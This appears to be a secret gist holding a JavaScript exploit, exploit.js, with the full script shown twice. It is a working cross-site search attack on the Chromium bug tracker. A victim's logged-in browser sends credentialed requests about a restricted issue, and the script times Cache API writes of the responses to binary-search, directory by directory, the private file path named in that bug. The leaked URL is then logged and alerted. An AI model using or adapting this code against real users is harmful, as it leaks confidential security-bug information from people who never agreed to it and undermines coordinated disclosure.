lbherrera/exploit.js Secret

## exploit.js
function clear_cache() {
	caches.open('cache').then(function(cache) {
		cache.keys().then(function(keys) {
			keys.forEach(function(request, index, array) {
				cache.delete(request);
			});
		});
	});
}

function split_array(array) {
	var halfWayThough = Math.floor(array.length / 2)
	var arrayFirstHalf = array.slice(0, halfWayThough);
	var arraySecondHalf = array.slice(halfWayThough, array.length);
	return [arrayFirstHalf, arraySecondHalf];
}

function check_end(leak, optPath, hold, xplStart) {
	if (hold[0].includes(".")) {
		console.log(leak + optPath + hold[0]);
		console.log("Time to exfiltrate url: " + String(performance.now() - xplStart));
		alert(leak + optPath + hold[0]);
		return true;
	}
	return false;
}

function exploit(query1, query2, optPath) {

	clear_cache();

	var preparedQuery1 = "";
	var preparedQuery2 = "";

	for (var i = 0; i < query1.length; i++) {
		preparedQuery1 += ` OR id:770148 "/src/third_party/${ optPath }${ query1[i] }"`;
	}

	for (var i = 0; i < query2.length; i++) {
		preparedQuery2 += ` OR id:770148 "/src/third_party/${ optPath }${ query2[i] }"`;
	}
	preparedQuery1 = preparedQuery1.substring(4);
	preparedQuery2 = preparedQuery2.substring(4);

	var base   = "https://bugs.chromium.org/p/chromium/issues/csv";
	var params = `?can=1&q=${ preparedQuery1 }&colspec=AllLabels${ "+AllLabels".repeat(500) }`;
	var url    = base + params;
	var times  = [];

	caches.open('cache').then(function(cache) {

		fetch(url, {
			mode: "no-cors",
			credentials: "include"
		}).then(function(response) {

			function req(start, request) {
				cache.put(new Request('foo' + Math.random()), request.clone()).then(function() {
					var end  = performance.now();
					var time = end - start;

					times.push(time);

					if (times.length > 500) {
						clear_cache();
						times.shift();

						var sum = times.reduce(function(a, b) { return a + b; });
						var avg = sum / times.length;

						if (avg >= avg_time) {
							times = times.filter(function(x) {
								return x < 2;
							});

							var query = split_array(query1);
							var hold = query[0].concat(query[1]);

							if (hold.length == 1) {
								if (check_end(leak, optPath, hold, xplStart)) return;
								var new_query = split_array(dirs[hold[0]]);
								var newPath = optPath + hold[0];
								return exploit(new_query[0], new_query[1], newPath);
							}
							console.log(query1);
							return exploit(query[0], query[1], optPath);
						} else {
							var query = split_array(query2);
							var hold = query[0].concat(query[1]);

							if (hold.length == 1) {
								if (check_end(leak, optPath, hold, xplStart)) return;
								var new_query = split_array(dirs[hold[0]]);
								var newPath = optPath + hold[0];
								return exploit(new_query[0], new_query[1], newPath);
							}
							console.log(query2);
							return exploit(query[0], query[1], optPath);
						}
						return;
					}
					req(performance.now(), request);
				});
			}
			req(performance.now(), response);
		});
	});
}

let avg_time = 2;
let leak     = "https://cs.chromium.org/chromium/src/third_party/";

let dirs = {}
dirs["third_party/"] = ["Python-Markdown/","SPIRV-Tools/","WebKit/","accessibility-audit/","accessibility_test_framework/","adobe/","afl/","analytics/","android_async_task/","android_crazy_linker/","android_data_chart/","android_deps/","android_media/","android_ndk/","android_opengl/","android_platform/","android_protobuf/","android_support_test_runner/","android_swipe_refresh/","android_system_sdk/","android_tools/","angle/","apache-portable-runtime/","apache-win32/","apk-patch-size-estimator/","apple_apsl/","apple_sample_code/","ashmem/","auto/","axe-core/","bazel/","bidichecker/","binutils/","bison/","blanketjs/","blink/","boringssl/","bouncycastle/","breakpad/","brotli/","bspatch/","byte_buddy/","cacheinvalidation/","catapult/","ced/","chaijs/","checkstyle/","chromite/","cld_3/","closure_compiler/","colorama/","crashpad/","crc32c/","cros_system_api/","custom_tabs_client/","d3/","decklink/","depot_tools/","deqp/","devscripts/","devtools-node-modules/","dom_distiller_js/","elfutils/","errorprone/","espresso/","eu-strip/","expat/","feed/","ffmpeg/","fips181/","flac/","flatbuffers/","flot/","fontconfig/","freetype/","gardiner_mod/","gestures/","gif_player/","glslang/","glslang-angle/","gnu_binutils/","google_appengine_cloudstorage/","google_input_tools/","google_toolbox_for_mac/","googletest/","gperf/","gradle_wrapper/","gson/","guava/","gvr-android-keyboard/","gvr-android-sdk/","haha/","hamcrest/","harfbuzz-ng/","hunspell/","hunspell_dictionaries/","iaccessible2/","iccjpeg/","icu/","icu4j/","ijar/","ink/","inspector_protocol/","instrumented_libraries/","intellij/","isimpledom/","javax_inject/","jinja2/","jmake/","jsoncpp/","jsr-305/","jstemplate/","junit/","khronos/","lcov/","leakcanary/","leveldatabase/","libFuzzer/","libXNVCtrl/","libaddressinput/","libaom/","libdrm/","libevdev/","libjingle_xmpp/","libjpeg/","libjpeg_turbo/","liblouis/","libovr/","libphonenumber/","libpng/","libprotobuf-mutator/","libsecret/","libsrtp/","libsync/","libudev/","libusb/","libvpx/","libwebm/","libwebp/","libxml/","libxslt/","libyuv/","lighttpd/","logilab/","lss/","lzma_sdk/","mach_override/","markdown/","markupsafe/","material_design_icons/","mesa/","metrics_proto/","mingw-w64/","minigbm/","minizip/","mocha/","mockito/","modp_b64/","molokocacao/","motemplate/","mozilla/","nacl_sdk_binaries/","netty-tcnative/","netty4/","node/","objenesis/","ocmock/","openh264/","openmax_dl/","openvr/","opus/","ots/","ow2_asm/","pdfium/","pefile/","perfetto/","perl/","pexpect/","ply/","polymer/","proguard/","protobuf/","pycoverage/","pyelftools/","pyftpdlib/","pylint/","pymock/","pystache/","pywebsocket/","qcms/","qunit/","re2/","requests/","rnnoise/","robolectric/","s2cellid/","sfntly/","shaderc/","simplejson/","sinonjs/","skia/","smhasher/","snappy/","speech-dispatcher/","spirv-headers/","spirv-tools-angle/","sqlite/","sqlite4java/","sudden_motion_sensor/","swiftshader/","tcmalloc/","test_fonts/","tlslite/","typ/","ub-uiautomator/","unrar/","usb_ids/","usrsctp/","v4l-utils/","visualmetrics/","vulkan/","vulkan-validation-layers/","wayland/","wayland-protocols/","wds/","web-animations-js/","webdriver/","webgl/","webrtc/","webrtc_overrides/","widevine/","win_build_output/","woff2/","wtl/","xdg-utils/","xstream/","yara/","yasm/","zlib/"];
dirs["pdfium/"]      = ["build_overrides/","core/","docs/","fpdfsdk/","fxbarcode/","fxjs/","infra/","public/","samples/","skia/","testing/","third_party/","tools/","xfa/"];
dirs["fpdfsdk/"]     = ["formfiller/","fpdfxfa/","pwl/"];
dirs["pwl/"]         =  ["README.md","cpwl_appstream.cpp","cpwl_appstream.h","cpwl_button.cpp","cpwl_button.h","cpwl_caret.cpp","cpwl_caret.h","cpwl_combo_box.cpp","cpwl_combo_box.h","cpwl_combo_box_embeddertest.cpp","cpwl_edit.cpp","cpwl_edit.h","cpwl_edit_ctrl.cpp","cpwl_edit_ctrl.h","cpwl_edit_embeddertest.cpp","cpwl_edit_impl.cpp","cpwl_edit_impl.h","cpwl_font_map.cpp","cpwl_font_map.h","cpwl_icon.cpp","cpwl_icon.h","cpwl_list_box.cpp","cpwl_list_box.h","cpwl_list_impl.cpp","cpwl_list_impl.h","cpwl_scroll_bar.cpp","cpwl_scroll_bar.h","cpwl_special_button.cpp","cpwl_special_button.h","cpwl_timer.cpp","cpwl_timer.h","cpwl_timer_handler.cpp","cpwl_timer_handler.h","cpwl_wnd.cpp","cpwl_wnd.h"];

var third_party = split_array(dirs["third_party/"]);
var xplStart = performance.now();
exploit(third_party[0], third_party[1], "");
	function clear_cache() {
	caches.open('cache').then(function(cache) {
	cache.keys().then(function(keys) {
	keys.forEach(function(request, index, array) {
	cache.delete(request);
	});
	});
	});
	}

	function split_array(array) {
	var halfWayThough = Math.floor(array.length / 2)
	var arrayFirstHalf = array.slice(0, halfWayThough);
	var arraySecondHalf = array.slice(halfWayThough, array.length);
	return [arrayFirstHalf, arraySecondHalf];
	}

	function check_end(leak, optPath, hold, xplStart) {
	if (hold[0].includes(".")) {
	console.log(leak + optPath + hold[0]);
	console.log("Time to exfiltrate url: " + String(performance.now() - xplStart));
	alert(leak + optPath + hold[0]);
	return true;
	}
	return false;
	}

	function exploit(query1, query2, optPath) {

	clear_cache();

	var preparedQuery1 = "";
	var preparedQuery2 = "";

	for (var i = 0; i < query1.length; i++) {
	preparedQuery1 += ` OR id:770148 "/src/third_party/${ optPath }${ query1[i] }"`;
	}

	for (var i = 0; i < query2.length; i++) {
	preparedQuery2 += ` OR id:770148 "/src/third_party/${ optPath }${ query2[i] }"`;
	}
	preparedQuery1 = preparedQuery1.substring(4);
	preparedQuery2 = preparedQuery2.substring(4);

	var base = "https://bugs.chromium.org/p/chromium/issues/csv";
	var params = `?can=1&q=${ preparedQuery1 }&colspec=AllLabels${ "+AllLabels".repeat(500) }`;
	var url = base + params;
	var times = [];

	caches.open('cache').then(function(cache) {

	fetch(url, {
	mode: "no-cors",
	credentials: "include"
	}).then(function(response) {

	function req(start, request) {
	cache.put(new Request('foo' + Math.random()), request.clone()).then(function() {
	var end = performance.now();
	var time = end - start;

	times.push(time);

	if (times.length > 500) {
	clear_cache();
	times.shift();

	var sum = times.reduce(function(a, b) { return a + b; });
	var avg = sum / times.length;

	if (avg >= avg_time) {
	times = times.filter(function(x) {
	return x < 2;
	});

	var query = split_array(query1);
	var hold = query[0].concat(query[1]);

	if (hold.length == 1) {
	if (check_end(leak, optPath, hold, xplStart)) return;
	var new_query = split_array(dirs[hold[0]]);
	var newPath = optPath + hold[0];
	return exploit(new_query[0], new_query[1], newPath);
	}
	console.log(query1);
	return exploit(query[0], query[1], optPath);
	} else {
	var query = split_array(query2);
	var hold = query[0].concat(query[1]);

	if (hold.length == 1) {
	if (check_end(leak, optPath, hold, xplStart)) return;
	var new_query = split_array(dirs[hold[0]]);
	var newPath = optPath + hold[0];
	return exploit(new_query[0], new_query[1], newPath);
	}
	console.log(query2);
	return exploit(query[0], query[1], optPath);
	}
	return;
	}
	req(performance.now(), request);
	});
	}
	req(performance.now(), response);
	});
	});
	}

	let avg_time = 2;
	let leak = "https://cs.chromium.org/chromium/src/third_party/";

	let dirs = {}
	dirs["third_party/"] = ["Python-Markdown/","SPIRV-Tools/","WebKit/","accessibility-audit/","accessibility_test_framework/","adobe/","afl/","analytics/","android_async_task/","android_crazy_linker/","android_data_chart/","android_deps/","android_media/","android_ndk/","android_opengl/","android_platform/","android_protobuf/","android_support_test_runner/","android_swipe_refresh/","android_system_sdk/","android_tools/","angle/","apache-portable-runtime/","apache-win32/","apk-patch-size-estimator/","apple_apsl/","apple_sample_code/","ashmem/","auto/","axe-core/","bazel/","bidichecker/","binutils/","bison/","blanketjs/","blink/","boringssl/","bouncycastle/","breakpad/","brotli/","bspatch/","byte_buddy/","cacheinvalidation/","catapult/","ced/","chaijs/","checkstyle/","chromite/","cld_3/","closure_compiler/","colorama/","crashpad/","crc32c/","cros_system_api/","custom_tabs_client/","d3/","decklink/","depot_tools/","deqp/","devscripts/","devtools-node-modules/","dom_distiller_js/","elfutils/","errorprone/","espresso/","eu-strip/","expat/","feed/","ffmpeg/","fips181/","flac/","flatbuffers/","flot/","fontconfig/","freetype/","gardiner_mod/","gestures/","gif_player/","glslang/","glslang-angle/","gnu_binutils/","google_appengine_cloudstorage/","google_input_tools/","google_toolbox_for_mac/","googletest/","gperf/","gradle_wrapper/","gson/","guava/","gvr-android-keyboard/","gvr-android-sdk/","haha/","hamcrest/","harfbuzz-ng/","hunspell/","hunspell_dictionaries/","iaccessible2/","iccjpeg/","icu/","icu4j/","ijar/","ink/","inspector_protocol/","instrumented_libraries/","intellij/","isimpledom/","javax_inject/","jinja2/","jmake/","jsoncpp/","jsr-305/","jstemplate/","junit/","khronos/","lcov/","leakcanary/","leveldatabase/","libFuzzer/","libXNVCtrl/","libaddressinput/","libaom/","libdrm/","libevdev/","libjingle_xmpp/","libjpeg/","libjpeg_turbo/","liblouis/","libovr/","libphonenumber/","libpng/","libprotobuf-mutator/","libsecret/","libsrtp/","libsync/","libudev/","libusb/","libvpx/","libwebm/","libwebp/","libxml/","libxslt/","libyuv/","lighttpd/","logilab/","lss/","lzma_sdk/","mach_override/","markdown/","markupsafe/","material_design_icons/","mesa/","metrics_proto/","mingw-w64/","minigbm/","minizip/","mocha/","mockito/","modp_b64/","molokocacao/","motemplate/","mozilla/","nacl_sdk_binaries/","netty-tcnative/","netty4/","node/","objenesis/","ocmock/","openh264/","openmax_dl/","openvr/","opus/","ots/","ow2_asm/","pdfium/","pefile/","perfetto/","perl/","pexpect/","ply/","polymer/","proguard/","protobuf/","pycoverage/","pyelftools/","pyftpdlib/","pylint/","pymock/","pystache/","pywebsocket/","qcms/","qunit/","re2/","requests/","rnnoise/","robolectric/","s2cellid/","sfntly/","shaderc/","simplejson/","sinonjs/","skia/","smhasher/","snappy/","speech-dispatcher/","spirv-headers/","spirv-tools-angle/","sqlite/","sqlite4java/","sudden_motion_sensor/","swiftshader/","tcmalloc/","test_fonts/","tlslite/","typ/","ub-uiautomator/","unrar/","usb_ids/","usrsctp/","v4l-utils/","visualmetrics/","vulkan/","vulkan-validation-layers/","wayland/","wayland-protocols/","wds/","web-animations-js/","webdriver/","webgl/","webrtc/","webrtc_overrides/","widevine/","win_build_output/","woff2/","wtl/","xdg-utils/","xstream/","yara/","yasm/","zlib/"];
	dirs["pdfium/"] = ["build_overrides/","core/","docs/","fpdfsdk/","fxbarcode/","fxjs/","infra/","public/","samples/","skia/","testing/","third_party/","tools/","xfa/"];
	dirs["fpdfsdk/"] = ["formfiller/","fpdfxfa/","pwl/"];
	dirs["pwl/"] = ["README.md","cpwl_appstream.cpp","cpwl_appstream.h","cpwl_button.cpp","cpwl_button.h","cpwl_caret.cpp","cpwl_caret.h","cpwl_combo_box.cpp","cpwl_combo_box.h","cpwl_combo_box_embeddertest.cpp","cpwl_edit.cpp","cpwl_edit.h","cpwl_edit_ctrl.cpp","cpwl_edit_ctrl.h","cpwl_edit_embeddertest.cpp","cpwl_edit_impl.cpp","cpwl_edit_impl.h","cpwl_font_map.cpp","cpwl_font_map.h","cpwl_icon.cpp","cpwl_icon.h","cpwl_list_box.cpp","cpwl_list_box.h","cpwl_list_impl.cpp","cpwl_list_impl.h","cpwl_scroll_bar.cpp","cpwl_scroll_bar.h","cpwl_special_button.cpp","cpwl_special_button.h","cpwl_timer.cpp","cpwl_timer.h","cpwl_timer_handler.cpp","cpwl_timer_handler.h","cpwl_wnd.cpp","cpwl_wnd.h"];

	var third_party = split_array(dirs["third_party/"]);
	var xplStart = performance.now();
	exploit(third_party[0], third_party[1], "");